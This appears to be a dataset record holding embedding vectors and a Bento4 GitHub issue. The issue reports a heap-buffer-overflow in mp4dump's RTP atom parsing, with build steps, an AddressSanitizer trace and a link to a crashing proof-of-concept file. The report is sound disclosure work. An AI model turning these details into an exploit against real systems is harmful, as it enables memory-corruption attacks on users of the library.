0.013714142143726349, -0.0117261353880167, -0.001391993253491819, 0.024166710674762726, -0.0003506677458062768, 0.0006421224097721279, -0.0246326494961977, 0.00817723199725151, -0.017829937860369682, -0.009598346427083015, -0.009031454101204872, 0.0038556463550776243, -0.011741667054593563, -0.011058289557695389, 0.010848616249859333, -0.013954877853393555, 0.030984953045845032, 0.0027043884620070457, -0.003073256928473711, 0.005696106236428022, 0.03311274200677872, -0.00466327415779233, -0.013325859792530537, -0.0245705246925354, 0.003651798004284501, 0.0034751296043395996, -0.015904055908322334, -0.009994395077228546, 0.004997197538614273, -0.007509386166930199, 0.0008440293604508042, -0.007594808004796505, -0.00020481907995417714, 0.0046127974055707455, -0.0007940379437059164, 0.020392604172229767, 0.006270764395594597, 0.006864836905151606, 0.016199151054024696, 0.011143711395561695, 0.014281035400927067, -0.007117220666259527, -0.006558093708008528, -0.001830752589739859, -0.005762114189565182, 0.006930844858288765, 0.00018079410074278712, 0.0032751639373600483, 0.022862080484628677, 0.022831019014120102, 0.026465343311429024, -0.0035702588502317667, 0.017519311979413033, -0.0073540727607905865, 0.007253119256347418, 0.011073820292949677, -0.002999483374878764, 0.01616808772087097, 0.014195612631738186, -0.010359380394220352, 0.001557013369165361, -0.01062341220676899, 0.01883947290480137, -0.01154752541333437, 0.026030467823147774, 0.022706767544150352, -0.02950947917997837, -0.008084043860435486, -0.005144744645804167, 0.009613878093659878, 0.0035042506642639637, -0.012797795236110687, -0.0032460426446050406, -0.01765909418463707, 0.017317404970526695, 0.04162389785051346, 0.005451487842947245, -0.010444802232086658, 0.020283883437514305, 0.007435612380504608, -0.01610596291720867, -0.007932613603770733, 0.009908972308039665, 0.0016191385220736265, 0.009062516503036022, -0.00324798421934247, 0.0007493854500353336, 0.004721516743302345, 0.011003929190337658, -0.00782389473170042, -0.0063561866991221905, 0.02168170176446438, 0.03569093719124794, -0.003183917608112097, -0.0068376571871340275, -0.017084434628486633, -0.003708099015057087, 0.015593430027365685, 0.01231632474809885, 0.004973900504410267, -0.00035091041354462504, 0.007124986033886671, -0.012044526636600494, -0.03388930857181549, 0.012549294158816338, 0.005696106236428022, -0.0010541873052716255, -0.00845679547637701, -0.01655637100338936, -0.020408134907484055, -0.01716209203004837, -0.009932269342243671, 0.020283883437514305, -0.013784033246338367, 0.021635107696056366, -0.017938656732439995, 0.0058591850101947784, 0.006103802938014269, -0.0034557152539491653, 0.008977094665169716, -0.015251741744577885, 0.0025024814531207085, -0.004333233926445246, 0.010413739830255508, 0.007264767773449421, 0.011003929190337658, 0.013652017340064049, -0.00026645895559340715, -0.010297255590558052, 0.01216877717524767, -0.0019404423655942082, 0.015422585420310497, 0.01599724404513836, 0.005851419176906347, -0.015026537701487541, -0.004558437969535589, 0.00044628235627897084, 0.005102033726871014, 0.029121197760105133, 0.0014618841232731938, 0.0036168526858091354, -0.011702838353812695, 0.004581735003739595, -0.005513613112270832, 0.00786660611629486, -0.004997197538614273, 0.002756806556135416, 0.012215371243655682, -0.010025457479059696, 0.01021959912031889, 0.004884595517069101, 0.02377842739224434, 0.029851168394088745, 0.0009988570818677545, -0.005467019509524107, 0.017767813056707382, -0.01851331628859043, 0.013255968689918518, 0.002285043243318796, 0.00498554902151227, 0.004010959528386593, -0.012782263569533825, -0.02185254544019699, -0.01039820909500122, 0.019926663488149643, -0.009085813537240028, 0.0016919415211305022, -0.019119037315249443, 0.006693992298096418, 0.0068726022727787495, 0.0026364389341324568, -0.0014317921595647931, 0.0014948880998417735, 0.007602573838084936, -0.006674578413367271, -0.009062516503036022, 0.004946720786392689, 0.014723677188158035, 0.01643212139606476, -0.0030674326699227095, 0.019833477213978767, 0.007416198030114174, 0.002966479165479541, 0.01327150035649538, 0.001295893220230937, 0.02222529798746109, 0.01175719778984785, 0.0017666859785094857, -0.005113682243973017, -0.01612149551510811, -0.011283492669463158, -0.0023335786536335945, -0.022939737886190414, -0.0024306492414325476, -0.0028286390006542206, 0.01630786992609501, 0.012650247663259506, -0.0013123953249305487, -0.013993705622851849, -0.003882826305925846, -0.00975365936756134, -0.01315501518547535, 0.00270050554536283, -0.029664792120456696, -0.005917427130043507, 0.004818587563931942, 0.014001471921801567, 0.001558954711072147, 0.006445491686463356, 0.060354650020599365, 0.019522851333022118, 0.010444802232086658, -0.004007076844573021, -0.0013104538666084409, 0.0018754050834104419, -0.009241126477718353, -0.005793176591396332, -0.017115497961640358, -0.022334016859531403, 0.0030654913280159235, 0.00659303879365325, 0.011741667054593563, -0.0026636188849806786, -0.01087191328406334, -0.0028577600605785847, 0.0035760828759521246, 0.007948145270347595, -0.004919541068375111, -0.010475865565240383, 0.007381252478808165, 0.02019069716334343, 0.009023687802255154, 0.007699644658714533, 0.018559910356998444, 0.005439839791506529, -0.010934039019048214, 0.01006428524851799, 0.0006406663451343775, -0.0239492729306221, 0.00904698483645916, 0.0027043884620070457, -0.006620218977332115, 0.01741059310734272, 0.006829891353845596, 0.007645284757018089, -0.008386904373764992, 0.025548996403813362, -0.005734934471547604, -0.03562881425023079, 0.008860609494149685, -0.0034557152539491653, -0.00519910454750061, 0.006923079025000334, 0.007109454832971096, 0.007121103350073099, -0.010670006275177002, -0.002341344254091382, 0.0014502356061711907, -0.011376680806279182, -0.003871177788823843, -0.013846158050000668, 0.005956255365163088, 0.0024403564166277647, 0.002768455073237419, -0.005587386898696423, -0.005342768970876932, 0.006239701993763447, -0.0010968984570354223, -0.01389275211840868, -0.006577507592737675, 0.00033368039294146, -0.003197507467120886, -0.0011910569155588746, -0.022877613082528114, 0.010569052770733833, -0.0047292825765907764, 0.020951731130480766, -0.008837312459945679, -0.0004227427125442773, 0.014063596725463867, -0.008262653835117817, -0.02074982412159443, -0.018373534083366394, -0.027428284287452698, -0.016028307378292084, 0.01570991426706314, -0.01869969069957733, -0.006659047212451696, 0.003789638401940465, -0.013411281630396843, 0.006779414601624012, 0.0017958071548491716, -0.009908972308039665, -0.020268352702260017, 0.0012745377607643604, 0.012774498201906681, -0.000004720819106296403, -0.017938656732439995, 0.033174868673086166, -0.005276761017739773, -0.0011396094923838973, -0.017674624919891357, 0.0002975215611513704, 0.0013424871722236276, 0.004892360884696245, 0.011749432422220707, 0.007730707060545683, -0.004092498682439327, 0.007062860764563084, -0.0006901723681949079, 0.010359380394220352, -0.014094659127295017, 0.021091511473059654, -0.007975324988365173, -0.015779806300997734, -0.0021374959032982588, -0.02106045000255108, -0.000558641622774303, 0.004966134671121836, -0.003789638401940465, 0.010390442796051502, -0.007773417979478836, 0.01647871546447277, -0.00028611576999537647, 0.019771350547671318, -0.002908236812800169, 0.005750465672463179, 0.0013046296080574393, -0.00044094346230849624, -0.002836404601112008, 0.009621643461287022, 0.007909317500889301, -0.005494199227541685, -0.010444802232086658, -0.013869455084204674, 0.0010037105530500412, 0.021883608773350716, 0.023933740332722664, 0.004414773546159267, -0.005692223086953163, -0.0036983920726925135, -0.0009347904124297202, -0.005734934471547604, -0.014746974222362041, -0.0029140610713511705, -0.007552097085863352, -0.005428191274404526, 0.006336772348731756, 0.0026112005580216646, -0.009738128632307053, 0.045910537242889404, -0.003539196215569973, -0.01188921369612217, -0.022209765389561653, -0.0032324527855962515, -0.005140861961990595, -0.007198759820312262, -0.005882481578737497, -0.01834247075021267, 0.017488248646259308, -0.0028053419664502144, 0.017115497961640358, 0.01654084026813507, -0.004589500837028027, 0.035411376506090164, -0.0010367146460339427, 0.02019069716334343, -0.0263100303709507, -0.0007668581674806774, 0.01154752541333437, 0.00017412049055565149, -0.009994395077228546, -0.0027451582718640566, -0.0011405801633372903, -0.002236507833003998, -0.005630098283290863, -0.0031625619158148766, 0.01975581981241703, -0.002343285595998168, -0.006876485422253609, -0.00322662852704525, 0.00947409588843584, 0.0010231246706098318, 0.007563745602965355, 0.0070007359609007835, 0.007839426398277283, 0.00975365936756134, -0.005303940735757351, 0.017892062664031982, 0.01612149551510811, -0.0021840897388756275, -0.024927744641900063, 0.004581735003739595, 0.01570991426706314, 0.0018026020843535662, -0.028127193450927734, -0.02307952009141445, -0.009668237529695034, 0.0020656634587794542, -0.0026403218507766724, -0.018233751878142357, 0.02593727968633175, 0.0032402186188846827, -0.004065318964421749, 0.015779806300997734, 0.013457875698804855, -0.006360069382935762, 0.022396141663193703, -0.01084085088223219, -0.0030654913280159235, -0.01133008673787117, 0.00025068497052416205, 0.007707410026341677 ]
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
SUMMARY: AddressSanitizer: heap-buffer-overflow in /Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:342 - Version ``` $ ./mp4dump MP4 File Dumper - Version 1.2 (Bento4 Version 1.6.0.0) (c) 2002-2011 Axiomatic Systems, LLC ``` branch [d02ef82](https://github.com/axiomatic-systems/Bento4/commit/d02ef8230a8fee4904a750eb912521c5f1c74e0b) - Platform ``` $ gcc --version gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 Copyright (C) 2019 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ uname -r 5.13.0-40-generic $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.4 LTS Release: 20.04 Codename: focal ``` - Steps to reproduce ``` $ mkdir build $ cd build $ cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" $ make $ ./mp4dump poc ``` - Asan ``` $ ./mp4dump poc [ftyp] size=8+16 major_brand = jk24 minor_version = 29017d compatible_brand = xi57 compatible_brand = nllr [tfdt] size=8+0 [mdat] size=8+397 ================================================================= ==2904681==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000091 at pc 0x7fdf4a26e59d bp 0x7ffde83ed0c0 sp 0x7ffde83ec868 WRITE of size 7 at 0x602000000091 thread T0 #0 0x7fdf4a26e59c in __interceptor_fread ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:989 #1 0x561f962c8759 in AP4_StdcFileByteStream::ReadPartial(void*, unsigned int, unsigned int&) /home/wulearn/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:342 #2 0x561f961fcd33 in AP4_ByteStream::Read(void*, unsigned int) /home/wulearn/Bento4/Source/C++/Core/Ap4ByteStream.cpp:54 #3 0x561f96262ec6 in AP4_RtpAtom::AP4_RtpAtom(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4RtpAtom.cpp:50 #4 0x561f961f65c1 in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) (/home/wulearn/Bento4/build/mp4dump+0x3245c1) #5 0x561f961f4b4e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689 #6 0x561f961f15ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #7 0x561f961f0bbd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #8 0x561f961e3115 in main /home/wulearn/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:342 #9 0x7fdf49ce90b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #10 0x561f961e18ed in _start (/home/wulearn/Bento4/build/mp4dump+0x30f8ed) 0x602000000091 is located 0 bytes to the right of 1-byte region [0x602000000090,0x602000000091) allocated by thread T0 here: #0 0x7fdf4a312787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x561f96262eac in AP4_RtpAtom::AP4_RtpAtom(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4RtpAtom.cpp:49 #2 0x561f961f65c1 in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) (/home/wulearn/Bento4/build/mp4dump+0x3245c1) #3 0x561f961f4b4e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689 #4 0x561f961f15ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #5 0x561f961f0bbd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #6 0x561f961e3115 in main /home/wulearn/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:342 #7 0x7fdf49ce90b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:989 in __interceptor_fread Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8010: fa fa[01]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2904681==ABORTING ``` poc: [poc.zip](https://github.com/axiomatic-systems/Bento4/files/8646748/poc.zip) Thanks!
heap-buffer-overflow in /Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:342
https://api.github.com/repos/axiomatic-systems/Bento4/issues/704/comments
0
2022-05-08T09:46:31
2022-05-08T15:02:52Z
https://github.com/axiomatic-systems/Bento4/issues/704
1,228,842,488
704
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : heap-buffer-overflow in /Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:342 Issue date: --- start body --- SUMMARY: AddressSanitizer: heap-buffer-overflow in /Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:342 - Version ``` $ ./mp4dump MP4 File Dumper - Version 1.2 (Bento4 Version 1.6.0.0) (c) 2002-2011 Axiomatic Systems, LLC ``` branch [d02ef82](https://github.com/axiomatic-systems/Bento4/commit/d02ef8230a8fee4904a750eb912521c5f1c74e0b) - Platform ``` $ gcc --version gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 Copyright (C) 2019 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ uname -r 5.13.0-40-generic $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.4 LTS Release: 20.04 Codename: focal ``` - Steps to reproduce ``` $ mkdir build $ cd build $ cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" $ make $ ./mp4dump poc ``` - Asan ``` $ ./mp4dump poc [ftyp] size=8+16 major_brand = jk24 minor_version = 29017d compatible_brand = xi57 compatible_brand = nllr [tfdt] size=8+0 [mdat] size=8+397 ================================================================= ==2904681==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000091 at pc 0x7fdf4a26e59d bp 0x7ffde83ed0c0 sp 0x7ffde83ec868 WRITE of size 7 at 0x602000000091 thread T0 #0 0x7fdf4a26e59c in __interceptor_fread ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:989 #1 0x561f962c8759 in AP4_StdcFileByteStream::ReadPartial(void*, unsigned int, unsigned int&) /home/wulearn/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:342 #2 0x561f961fcd33 in AP4_ByteStream::Read(void*, unsigned int) /home/wulearn/Bento4/Source/C++/Core/Ap4ByteStream.cpp:54 #3 0x561f96262ec6 in AP4_RtpAtom::AP4_RtpAtom(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4RtpAtom.cpp:50 #4 0x561f961f65c1 in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) (/home/wulearn/Bento4/build/mp4dump+0x3245c1) #5 0x561f961f4b4e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689 #6 0x561f961f15ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #7 0x561f961f0bbd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #8 0x561f961e3115 in main /home/wulearn/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:342 #9 0x7fdf49ce90b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #10 0x561f961e18ed in _start (/home/wulearn/Bento4/build/mp4dump+0x30f8ed) 0x602000000091 is located 0 bytes to the right of 1-byte region [0x602000000090,0x602000000091) allocated by thread T0 here: #0 0x7fdf4a312787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x561f96262eac in AP4_RtpAtom::AP4_RtpAtom(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4RtpAtom.cpp:49 #2 0x561f961f65c1 in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) (/home/wulearn/Bento4/build/mp4dump+0x3245c1) #3 0x561f961f4b4e in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689 #4 0x561f961f15ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #5 0x561f961f0bbd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #6 0x561f961e3115 in main /home/wulearn/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:342 #7 0x7fdf49ce90b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:989 in __interceptor_fread Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8010: fa fa[01]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2904681==ABORTING ``` poc: [poc.zip](https://github.com/axiomatic-systems/Bento4/files/8646748/poc.zip) Thanks! --- end body ---
6,131
[ -0.03520208224654198, 0.015590325929224491, -0.012479545548558235, 0.014286275021731853, 0.031472060829401016, 0.0016637573717162013, -0.04601331800222397, 0.03770818933844566, -0.015969157218933105, 0.043652914464473724, -0.016042008996009827, 0.018038153648376465, 0.01372531522065401, 0.009689314290881157, 0.010701957158744335, -0.006148708052933216, -0.028951380401849747, 0.007882585749030113, -0.023137792944908142, 0.0037245580460876226, 0.02713008038699627, -0.01746990717947483, -0.0027738395147025585, 0.05455157160758972, -0.012617964297533035, 0.011386766098439693, -0.014788953587412834, 0.005733451806008816, -0.009164780378341675, 0.012858375906944275, 0.0059483652003109455, 0.042137593030929565, -0.004921151790767908, 0.0010572645114734769, 0.030131584033370018, 0.019028939306735992, 0.023939164355397224, 0.07495012879371643, 0.014140571467578411, 0.008217704482376575, -0.0015981905162334442, -0.0575239323079586, -0.023458341136574745, 0.018183857202529907, -0.0011018863879144192, 0.013135213404893875, 0.013951156288385391, 0.009077358059585094, -0.03514380007982254, 0.009827733039855957, 0.011124499142169952, -0.008530967868864536, -0.027538051828742027, -0.05108381435275078, 0.008778665214776993, -0.012428549118340015, 0.01306964736431837, 0.029490485787391663, 0.0019670038018375635, -0.005602317862212658, -0.015823451802134514, 0.002624492859467864, 0.022350991144776344, 0.027071800082921982, -0.00009783794666873291, 0.006192419212311506, -0.019291207194328308, 0.02347291074693203, -0.043507207185029984, 0.023458341136574745, -0.028936810791492462, -0.02385174110531807, 0.022569546476006508, 0.05259913578629494, -0.004513180814683437, -0.006126852240413427, 0.029709041118621826, 0.01961175538599491, -0.040126875042915344, 0.061020828783512115, -0.05405617505311966, 0.03983546793460846, -0.03884468227624893, 0.024769676849246025, 0.04003945365548134, -0.002041677013039589, -0.059563785791397095, -0.07401762157678604, -0.013047791086137295, -0.045925892889499664, 0.010803950019180775, 0.020791957154870033, 0.03030642867088318, 0.009711170569062233, 0.016100289300084114, 0.03435700014233589, -0.03275425359606743, -0.025745892897248268, -0.05781533941626549, 0.013135213404893875, -0.02022371254861355, -0.0030634261202067137, 0.000742634991183877, 0.019276635721325874, 0.011007935740053654, -0.0038866535760462284, 0.003134456928819418, -0.03359933942556381, 0.01933491788804531, 0.11009392887353897, 0.01387830451130867, -0.0008291467092931271, -0.010461545549333096, 0.02102508395910263, -0.004640671890228987, 0.03255026787519455, 0.0035843178629875183, -0.0323171429336071, -0.05627087876200676, -0.03491067513823509, -0.011080787517130375, -0.022117864340543747, -0.0022584116086363792, 0.009980722330510616, -0.009871444664895535, 0.038028739392757416, 0.005769877694547176, -0.01643540896475315, -0.02251126430928707, -0.034327857196331024, -0.013186209835112095, -0.05306538939476013, -0.018344130367040634, -0.03255026787519455, -0.022452984005212784, -0.004360191524028778, -0.013856448233127594, 0.043070096522569656, 0.03310394287109375, -0.008501827716827393, -0.061312235891819, -0.02077738754451275, 0.02498823218047619, 0.008385264314711094, -0.008144852705299854, -0.009121068753302097, -0.00028526107780635357, 0.029024232178926468, -0.016129430383443832, -0.02067539468407631, 0.0006492933607660234, -0.028397705405950546, 0.03339535370469093, 0.006024859379976988, 0.05099639296531677, -0.00035560879041440785, 0.019684607163071632, 0.039893750101327896, 0.005682455375790596, 0.0020471408497542143, -0.003963148221373558, -0.04339064657688141, 0.02392459288239479, -0.044789403676986694, -0.01764475181698799, -0.019320348277688026, 0.028252001851797104, 0.02526506967842579, 0.002762911841273308, 0.01918921433389187, 0.005012216977775097, 0.0047608776949346066, 0.003777375677600503, 0.020558832213282585, -0.07133667171001434, -0.01784873753786087, -0.002863083267584443, 0.04038914293050766, -0.023050369694828987, 0.010956939309835434, 0.0022511265706270933, 0.006505682598799467, 0.014592253603041172, -0.006196061614900827, 0.012013292871415615, -0.012909372337162495, 0.021345634013414383, -0.04470198228955269, 0.03890296444296837, 0.004108852241188288, -0.007361693773418665, -0.01608571968972683, -0.005922866985201836, -0.008960794657468796, 0.053007107228040695, -0.023050369694828987, -0.033366210758686066, -0.0025279640685766935, -0.007452758494764566, 0.016959942877292633, -0.0025024658534675837, -0.008363408036530018, -0.03901952505111694, 0.012421264313161373, -0.03138463571667671, 0.013251776807010174, -0.03380332514643669, 0.054872117936611176, 0.028951380401849747, -0.0003189551061950624, -0.0268241036683321, -0.025119366124272346, 0.02609558217227459, -0.001795801566913724, -0.01325906254351139, 0.014126000925898552, -0.03820358216762543, 0.014606824144721031, -0.02157875895500183, 0.0013923837104812264, 0.013667033053934574, -0.005707953590899706, 0.009084642864763737, -0.019524333998560905, -0.04015601798892021, 0.00008941443229559809, -0.006596747785806656, 0.015124073252081871, 0.009835018776357174, -0.008363408036530018, 0.03904866799712181, 0.0017648395150899887, -0.0279314536601305, -0.0013186209835112095, 0.010199278593063354, -0.01475981343537569, -0.008268700912594795, 0.004006859380751848, 0.014024008065462112, 0.004396617412567139, -0.011080787517130375, 0.012472260743379593, -0.013091502711176872, -0.023312637582421303, 0.007693170104175806, 0.052424293011426926, -0.031501200050115585, -0.002710093976929784, -0.010774808935821056, 0.005544036626815796, 0.016930801793932915, 0.0015144107164815068, 0.012282845564186573, 0.0046807401813566685, 0.0063745491206645966, -0.019101791083812714, 0.02975275367498398, 0.015065792016685009, -0.012071575038135052, -0.013324628584086895, 0.023487482219934464, -0.006079498678445816, -0.002323978580534458, 0.0016400804743170738, 0.001398758264258504, -0.005172491539269686, -0.010971509851515293, 0.0010991543531417847, -0.031880032271146774, -0.020587973296642303, 0.03622201085090637, -0.008013718761503696, -0.002353119198232889, -0.041409071534872055, -0.019597185775637627, 0.005248985718935728, 0.027742037549614906, -0.006214274559170008, 0.003985004033893347, -0.028907669708132744, -0.005307267419993877, 0.02306493930518627, -0.011583466082811356, 0.03269597142934799, -0.012049718759953976, -0.015386340208351612, 0.028077157214283943, -0.013885589316487312, -0.012173567898571491, -0.0038538703229278326, 0.02213243395090103, -0.012836520560085773, -0.05915581434965134, 0.009842303581535816, 0.0037810183130204678, 0.027567192912101746, -0.022977517917752266, 0.001342297880910337, -0.04257470369338989, -0.0010854946449398994, -0.019116362556815147, -0.0030106084886938334, -0.006145065184682608, 0.008305126801133156, -0.03185088932514191, -0.0014779847115278244, -0.03651341795921326, -0.006090426351875067, -0.009652888402342796, -0.0019633611664175987, 0.05708681792020798, -0.05426016077399254, -0.0282082911580801, -0.013229921460151672, -0.025381634011864662, -0.02364775538444519, -0.013419336639344692, -0.003154491074383259, -0.011226492002606392, 0.01605657860636711, -0.050005607306957245, 0.013608751818537712, -0.033191367983818054, 0.0249299518764019, 0.010374123230576515, -0.010629105381667614, 0.008778665214776993, 0.032637692987918854, -0.07191948592662811, 0.02019457146525383, -0.01303322147578001, 0.002016178797930479, 0.0004589675518218428, -0.041059382259845734, 0.013004080392420292, -0.033191367983818054, -0.01916007325053215, 0.0020453196484595537, 0.002249305136501789, 0.01284380629658699, -0.02047140896320343, 0.03587232157588005, 0.007321625016629696, -0.007139495108276606, -0.014701531268656254, 0.018373271450400352, 0.02254040539264679, -0.010242990218102932, -0.007751451805233955, 0.027071800082921982, 0.0010481580393388867, 0.034648407250642776, 0.02692609652876854, 0.030597835779190063, -0.0010845840442925692, -0.01303322147578001, -0.024492839351296425, -0.023516623303294182, 0.023414630442857742, -0.029636189341545105, -0.0034768611658364534, -0.012297416105866432, -0.02523592859506607, 0.0027392348274588585, 0.002067175228148699, -0.00003272647882113233, 0.006480184383690357, -0.010060859844088554, 0.0015289811417460442, -0.009113783948123455, -0.02810629829764366, 0.043303221464157104, -0.01895608752965927, 0.038028739392757416, -0.007474614307284355, -0.02036941610276699, 0.003850227687507868, 0.01284380629658699, -0.025760464370250702, 0.008530967868864536, -0.030335567891597748, 0.021593330428004265, 0.04388603940606117, -0.050209593027830124, 0.009077358059585094, 0.013557755388319492, -0.015357199124991894, 0.044964250177145004, -0.03284167870879173, -0.008640246465802193, -0.03234628215432167, 0.05813588947057724, -0.02130192145705223, -0.061079107224941254, -0.005077783949673176, 0.03724193572998047, -0.01513864379376173, -0.013178925029933453, 0.016144001856446266, -0.0783887431025505, 0.012319271452724934, 